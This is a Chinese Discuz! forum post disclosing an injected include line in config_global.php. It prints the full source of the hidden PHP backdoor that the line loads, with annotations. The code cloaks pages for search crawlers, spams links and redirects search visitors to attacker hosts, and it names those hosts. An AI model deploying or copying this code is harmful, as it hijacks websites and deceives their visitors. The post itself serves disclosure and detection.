

Discuz! X3.4版本以下/config/config_global.php注入漏洞@include(base64_decode公示 discuz 交流


本帖最后由 民审-M 于 2018-9-28 16:22 编辑

Discuz! X3.4版本以下/config/config_global.php注入漏洞:
@include(base64_decode('L3RtcC8uVGVzdC11bml4L2NsaWVudC5waHA='));

解析:
该 base64 字符串解码后为服务器上的路径 /tmp/.Test-unix/client.php,即被 @include 加载的隐藏文件。
该文件中引用的远程控制地址:
www.womendemengxiang.com

gbk.baidu901.com

9a9vj.com:8888



client.php 文件内容:

<?php
// Sample header: this is the file that the injected
// `@include(base64_decode(...))` line in Discuz's config_global.php loads.
// Output is gzip-buffered and all error display is switched off, so PHP
// notices raised by the code below never reach the host site's pages.
ob_start("ob_gzhandler");
ini_set('html_errors',false);
ini_set('display_errors',false);
define("APP_INCLUDE_FLAG","TRUE");
define('APP_JACK_CHARSET','GBK');
header("Content-type: text/html; charset=".APP_JACK_CHARSET);
// All payload files live in a hidden directory under /tmp whose name
// resembles the X11 socket directory. The directory itself (/tmp/.X11-unix/)
// and the single-letter files below are the host-side indicators to look for.
define('APP_JACK_DOCUMENTROOT','/tmp/.X11-unix/');
// rand(1,6) picks one of six keyword files (z1..z6) per request.
define('APP_JACK_KEYWORD',APP_JACK_DOCUMENTROOT.'z'.rand(1,6).'');
define('APP_JACK_TEMPLATE',APP_JACK_DOCUMENTROOT.'m');
define('APP_JACK_ARTICLE',APP_JACK_DOCUMENTROOT.'w');
define('APP_JACK_DES',APP_JACK_DOCUMENTROOT.'ms');
define('APP_JACK_BIANLIANG',APP_JACK_DOCUMENTROOT.'b');
define('APP_JACK_BIANLIANG_B',APP_JACK_DOCUMENTROOT.'b2');
define('APP_JACK_BIANLIANG_C',APP_JACK_DOCUMENTROOT.'b3');
define('APP_MIX_KWD_FILE',APP_JACK_DOCUMENTROOT.'hh');
define('APP_JACK_CACHED','Uncached');
// Stored as strings, not ints; the only constants referenced later in this
// file are APP_JACK_TEMPLATE and APP_JACK_APPFILE.
define('APP_JACK_MIN_PAR','3');
define('APP_JACK_MAX_PAR','3');
define('APP_JACK_MIN','10');        
define('APP_JACK_MAX','15');
// The file that run() include()s and echoes to crawlers (/tmp/.X11-unix/a).
define('APP_JACK_APPFILE',APP_JACK_DOCUMENTROOT.'a');

/**
 * Returns one fabricated discuz.net thread/forum URL with a random id.
 *
 * Used by missclient::_uncondition_hook() to emit link-spam anchors.
 * Note the mix of rand() for the ids and mt_rand() for the index.
 *
 * @return string
 */
function App_GetLink(){
        $link = array();
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        $link[] = "http://www.discuz.net/forum-".rand(1000,999999999)."-1.html";
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        return $link[mt_rand(0,count($link)-1)];
}

/**
 * Identical copy of App_GetLink(): one random fake discuz.net URL.
 *
 * Not referenced anywhere else in this file.
 *
 * @return string
 */
function App_GetSelf(){
$link = array();
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        $link[] = "http://www.discuz.net/forum-".rand(1000,999999999)."-1.html";
        $link[] = "http://www.discuz.net/thread-".rand(1000000,999999999)."-1-1.html";
        return $link[mt_rand(0,count($link)-1)];
}
// Returns a random image URL on the attacker-controlled host
// www.womendemengxiang.com (one of the three hosts listed in this post).
// Not referenced elsewhere in this file.
function getImg(){
        return 'http://www.womendemengxiang.com/imgr/images/'.rand(1,260).".jpg";
}
// Entry point: runs on every request that loads config_global.php.
// missclient is declared further down; PHP hoists unconditional top-level
// class declarations, so instantiating it here works.
$my_app = new missclient();
$my_app->run();

/**
 * Cloaking / SEO-hijack client.
 *
 * Behaviour as implemented in run():
 *  - Search-engine crawlers (only Sogou and bingbot are enabled) that hit a
 *    Discuz thread/forum/member URL get the contents of /tmp/.X11-unix/a
 *    instead of the real page; other crawler hits get 100 link-spam anchors.
 *  - Human visitors arriving from the listed search engines on such a URL
 *    are redirected to http://9a9vj.com:8888/.
 *  - Everything else falls through to _unSpider_hook(), which does nothing,
 *    so ordinary visitors see the site unchanged.
 *
 * Detection hints grounded in this file: the /tmp/.X11-unix/ directory, the
 * "domain-filter-bypass" cookie, redirects to 9a9vj.com:8888, and requests
 * to gbk.baidu901.com/app.php.
 */
class missclient{
        
        public $show_spider;
        public $jump_ref;
        public $http_ref_filter;
        public $jump_url = "";
        public $domain = "";
        public $condition = "";
        public $app_server = "";
        public $log_spider = "";
        public $cur_spider = "";
        public $allow_ip = "";
        public $isCache = false;

        /**
         * Configures the instance and dispatches to the spider / visitor paths.
         *
         * $this->condition is true when tid, fid or mid is present in the query
         * string with a large enough value; missing keys raise notices that the
         * header's display_errors=false hides. isCache is hard-coded to false,
         * so the whole cache branch (coreAppCache, the per-host /tmp dir) is dead
         * code in this build.
         *
         * @return void
         */
        public function run(){
                $this->domain = 'discuz';
                // Referer substrings that mark a visitor as coming from a search engine.
                $this->jump_ref = explode("|","baidu.|haoso.|haosou.|bing.|sogou.|soso.|so.com|.sm.cn|spm=");
                // Referer substrings that look like search-operator queries (inurl:, site:);
                // such visitors are never redirected, see isRef().
                $this->http_ref_filter = explode("|","inurl:|site:|site%3A|inurl%3A");
                // Despite the name this is an exclusion list: isAllowdIp() returns
                // false for any client IP containing one of these prefixes.
                $this->allow_ip = "218.80.218.|10.4.62.|10.4.33";
                $this->condition = (($_GET['tid']> 1000000 && $this->isAllowdIp()) || ($_GET['fid']> 1000 && $this->isAllowdIp()) || ($_GET['mid']> 1 && $this->isAllowdIp()));
                // Remote content server; only used by getPage(), which nothing here calls.
                $this->app_server = "http://gbk.baidu901.com/app.php";
                $this->isCache  = False;
                if($this->isSpider() && $this->isAllowdIp()){
                                if($this->condition){
                                        if($this->isCache){
                                                $relset_host = $this->getServerName();
                                                // Per-host cache directory, created world-writable (0777).
                                                $dir = (substr(PHP_OS, 0, 3) == 'WIN' ? 'C:/windows/temp/' : '/tmp/') . substr(md5($relset_host), 26) . chr(47);
                                                $cacheFile = $dir.'sess_' . substr(md5(http_build_query($_GET)), 6);
                                                if(!@file_exists($dir)){
                                               mkdir($dir, 0777);
                                    }
                                                if(@file_exists($cacheFile) && @filesize ($cacheFile) > 32 ){
                                                        // coreAppCache::read() unserialize()s the cache file content.
                                                        $var = coreAppCache::read($cacheFile);
                                                        $page = file_get_contents(APP_JACK_TEMPLATE);
                                                        foreach($var as $key=>$v){
                                                                $flag = "{".$key."}";
                                                                $page = str_replace($flag,$v,$page);
                                                        }
                                                        echo $page;
                                                        exit();
                                                }
                                                else
                                                {        
                                                        // include() the payload file and use its return value as the page.
                                                        $currentPage = include(APP_JACK_APPFILE);
                                                        if($currentPage && strlen($currentPage) > 32 && stristr($currentPage,"</explode>")){
                                                                $var = self::cut($currentPage,"<explode>","</explode>");
                                                                $var = coreAppCache::decode($var);
                                                                $page = file_get_contents(APP_JACK_TEMPLATE);
                                                                foreach($var as $key=>$v){
                                                                        $flag = "{".$key."}";
                                                                        $page = str_replace($flag,$v,$page);
                                                                }
                                                                echo $page;
                                                                @coreAppCache::writenocode($currentPage,$cacheFile);
                                                        }
                                                }
                                                die();
                                        }
                                        else
                                        {
                                                // Live path: the crawler receives /tmp/.X11-unix/a verbatim
                                                // and the real Discuz page is never rendered.
                                                $currentPage = include(APP_JACK_APPFILE);
                                                echo $currentPage;
                                                die();
                                        }
                                }
                                else
                                {

                                        $this->_uncondition_hook();
                                }
                }
                else
                {        
                        // Not a crawler: redirect search-engine referrals on matching URLs.
                        if($this->isRef() && $this->condition){
                                $this->Jump();
                        }
                        else
                        {
                                $this->_unSpider_hook();
                        }
                }
        }

        /**
         * Returns false when the client IP contains any entry of $this->allow_ip,
         * true otherwise. The name is inverted: the list excludes, it does not allow.
         *
         * @return bool
         */
        public function isAllowdIp(){
                $ip = $this->clientIp();
                $non_list = explode("|",$this->allow_ip);
                foreach($non_list as $iplist){
                        if(@stristr($ip,$iplist)){
                                return false;
                        }
                }
                return true;
        }

        /**
         * Best-effort client IP.
         *
         * HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are consulted before
         * REMOTE_ADDR; both are request headers the client controls, so the
         * IP exclusion in isAllowdIp() can be influenced by the sender. If no
         * branch matches, $onlineip is undefined when preg_match() runs (notice
         * hidden by display_errors=false) and 'unknown' is returned. The regex
         * only extracts a 7-15 character run of digits and dots (IPv4-shaped).
         *
         * @return string
         */
        public function clientIp(){
                if(getenv('HTTP_CLIENT_IP') && strcasecmp(getenv('HTTP_CLIENT_IP'), 'unknown')) {
                        $onlineip = getenv('HTTP_CLIENT_IP');
                } elseif(getenv('HTTP_X_FORWARDED_FOR') && strcasecmp(getenv('HTTP_X_FORWARDED_FOR'), 'unknown')) {
                        $onlineip = getenv('HTTP_X_FORWARDED_FOR');
                } elseif(getenv('REMOTE_ADDR') && strcasecmp(getenv('REMOTE_ADDR'), 'unknown')) {
                        $onlineip = getenv('REMOTE_ADDR');
                } elseif(isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], 'unknown')) {
                        $onlineip = $_SERVER['REMOTE_ADDR'];
                }
                preg_match("/[\d\.]{7,15}/", $onlineip, $onlineipmatches);
                $onlineip = $onlineipmatches[0] ? $onlineipmatches[0] : 'unknown';
                unset($onlineipmatches);
                return $onlineip;
        }

        /**
         * User-Agent substring check for search-engine crawlers.
         *
         * Only 'sogou' and 'bingbot' are active; Baidu, Haosou and 360 are
         * commented out. On a match, $this->cur_spider is set to the label and,
         * if $this->log_spider is a path, a line is appended to that file
         * (log_spider is never set in this file, so no log is written).
         *
         * @return bool
         */
        public function isSpider(){
                $bots = array(
                                                //'Baidu'        => 'baiduspider',
                                                'Sogou'        => 'sogou',
                                                //'Haoso'        => 'haosouspider',
                                                //'360spider'        => '360spider',
                                                'bingbot'        => 'bingbot'
                 );
                $userAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
                foreach ($bots as $k => $v){
                        if (stristr($userAgent,$v)){
                                if(!empty($this->log_spider)){
                                        @file_put_contents($this->log_spider,$v."->Visited ".$_SERVER['QUERY_STRING']."at: ".date("Y-m-d H:i:s")."\n",FILE_APPEND);
                                }
                                $this->cur_spider = $k;
                                return true;
                                break; // unreachable after return
                        }
                }
                return false;        
        }

        /**
         * Decides whether a human visitor should be redirected.
         *
         * Returns false (and sets a 3-day "domain-filter-bypass" cookie) for
         * excluded IPs and for referers containing search operators, false if
         * that cookie is already present, true if the referer contains one of
         * the jump_ref engine substrings, and implicitly null otherwise.
         * The cookie is a useful browser-side artefact when investigating.
         *
         * @return bool|null
         */
        public function isRef(){
                $ref = strtolower(@$_SERVER['HTTP_REFERER']);
                if(isset($_COOKIE["domain-filter-bypass"])){
                        return false;
                }
                
                if(!$this->isAllowdIp()){
                        setcookie("domain-filter-bypass", "lol", time() + 259200);
                        return false;
                }

                foreach($this->http_ref_filter as $r){
                        $r = trim($r);
                        if(stristr($ref,$r)){
                                setcookie("domain-filter-bypass", "lol", time() + 259200);
                                return false;
                        }
                }
        
                foreach($this->jump_ref as $r){
                        $r = trim($r);
                        if(stristr($ref,$r)){
                                return true;
                        }
                }
        }

        /**
         * Lower-cased SERVER_NAME (or HTTP_HOST as fallback).
         *
         * The 'http://' strip is ineffective for a leading prefix: strpos()
         * returns 0 in that case, which the bare if() treats as false.
         * Only used by the disabled cache branch in run().
         *
         * @return string
         */
        public function getServerName() 
        { 
                $ServerName = strtolower($_SERVER['SERVER_NAME']?$_SERVER['SERVER_NAME']:$_SERVER['HTTP_HOST']); 
                if( strpos($ServerName,'http://') ) 
                { 
                        return str_replace('http://','',$ServerName); 
                } 
                return $ServerName; 
        }

        /**
         * Fetches content from the remote app_server, forwarding the whole
         * local query string as localPar. $cache is undefined when isCache is
         * false. Not called anywhere in this file.
         *
         * @return string|null
         */
        public function getPage(){
                if($this->isCache){
                        $cache="cached";
                }
                $url  = $this->app_server."?domain=".$this->domain."&gid=199&spider=".$this->cur_spider."&cache=".$cache."&localPar=".http_build_query($_GET);
                return $this->HttpVisit($url);
        }

    /**
     * HTTP GET with three fallbacks: curl, file_get_contents with a stream
     * context, then a raw fsockopen request.
     *
     * Every call is @-suppressed, so failures return null/''. The curl path
     * sets only a connect timeout, not a total transfer timeout. The socket
     * fallback assumes port 80 unless host:port is given and returns the raw
     * response including status line and headers.
     *
     * @param string $weburl
     * @return string|null
     */
    public function HttpVisit($weburl) {
        $remote_data = NULL;
        if (function_exists('curl_exec')) {
            $curl = @curl_init();
            @curl_setopt($curl, CURLOPT_URL, $weburl);
            @curl_setopt($curl, CURLOPT_HEADER, 0);
            @curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 30);
            @curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
            $remote_data = @curl_exec($curl);
            @curl_close($curl);
        } else {
            if (function_exists('stream_context_create')) {
                $header_array = array('http' => array('method' => 'GET', 'timeout' => 30));
                $http_header = @stream_context_create($header_array);
                $remote_data = @file_get_contents($weburl, false, $http_header);
            } else {
                $temp_url = explode("/", $weburl);
                $new_url = $temp_url[2];
                $http_port = 80;
                // Path starts after "http://" (7 chars) plus the host.
                $get_file = substr($weburl, strlen($new_url) + 7);
                if (strstr($new_url, chr(58))) {
                    $s_var_array['td'] = explode(chr(58), $new_url);
                    $new_url = $s_var_array['td'][0];
                    $http_port = $s_var_array['td'][1];
                }
                $fsock_result = @fsockopen($new_url, $http_port);
                @fputs($fsock_result, 'GET ' . $get_file . ' HTTP/1.1' . "\r\n" . 'Host:' . $new_url . "\r\n" . 'Connection:Close' . "\r\n\r\n");
                while (!feof($fsock_result)) {
                    $remote_data .= fgets($fsock_result, 1024);
                }
                @fclose($fsock_result);
            }
        }
        return $remote_data;
    }

        /**
         * Redirects non-excluded visitors to the attacker host with the
         * domain label as query (http://9a9vj.com:8888/?jpb_discuz here).
         * The Location header and exit stop normal page rendering.
         *
         * @return void
         */
        public function Jump(){
                if($this->isAllowdIp()){
                        $domain  = str_replace(".","_",$this->domain);
                        header('Location: http://9a9vj.com:8888/?jpb_'.$domain);
                        exit;
                }
        }
        
        /**
         * Crawler hit on a non-matching URL: emits 100 empty anchors pointing
         * at fake discuz.net URLs (link spam). $array is unused.
         *
         * @return void
         */
        public function _uncondition_hook(){
                $array = array();
                for($a=0;$a<100;$a++){
                        echo '<a href="'.App_GetLink().'"></a>'."\n";
                }
        }

        /**
         * Ordinary visitor path: intentionally empty, so the site behaves
         * normally and the infection is hard to notice from a browser.
         *
         * @return void
         */
        public function _unSpider_hook(){
                //
        }


        /**
         * Loose (==) prefix test. Not referenced in this file.
         *
         * @param string $needle
         * @param string $haystack
         * @return bool
         */
        public function strStartWith($needle, $haystack){
            return (substr($haystack, 0, strlen($needle))==$needle);
        }

        /**
         * Random [0-9a-z] string built with rand(). Not referenced in this file.
         *
         * @param int $length
         * @return string|null
         */
        public function rndStr($length=8){
                $str = null;
                $strPol = "0123456789abcdefghijklmnopqrstuvwxyz";
                $max = strlen($strPol)-1;
                for($i=0;$i<$length;$i++){
                        $str.=$strPol[rand(0,$max)];
                }
                return $str;
        }

        /**
         * Text between the first $from and the next $end in $file.
         * Duplicated in coreAppCache::cut(). Called via self::cut() from run()
         * although it is not declared static.
         *
         * @param string $file
         * @param string $from
         * @param string $end
         * @return string
         */
        public function cut($file,$from,$end)
        { 
                $message=explode($from,$file); 
                $message=explode($end,$message[1]); 
                return   $message[0];
        }
}

/**
 * Cache helper for the (disabled) cache branch of missclient::run().
 *
 * Every method is declared as an instance method but is only ever called
 * statically (coreAppCache::read, self::encode, ...). PHP 7 deprecated that
 * and PHP 8 throws an Error, so this class would fail on PHP 8 if the cache
 * branch were ever enabled. decode() unserialize()s data read from a file in
 * a world-writable directory, which is a standard object-injection hazard.
 */
class coreAppCache{
        // Serialize + gzcompress + base64 the value into $filename.
        public function write($file,$filename){
                return file_put_contents($filename,self::encode($file));
        }
        // Write $file to $filename without encoding.
        public function writenocode($file,$filename){
                return file_put_contents($filename,$file);
        }
        // Read a cache file, strip the <explode> wrapper if present, and decode().
        public function read($filename){
                $content = file_get_contents($filename);
                if(stristr($content,"</explode>")){
                        $content = self::cut($content,"<explode>","</explode>");
                }
                return self::decode($content);
        }

        // base64(gzcompress(serialize(x))).
        public function encode($file){
                return base64_encode(gzcompress(serialize($file))); 
        }

        // Inverse of encode(); unserialize() on file-sourced input.
        public function decode($file){
                return unserialize(gzuncompress(base64_decode($file))); 
        }
        
        // Text between the first $from and the next $end; same as missclient::cut().
        public function cut($file,$from,$end)
        { 
                $message=explode($from,$file); 
                $message=explode($end,$message[1]); 
                return   $message[0];
        }
}

?>

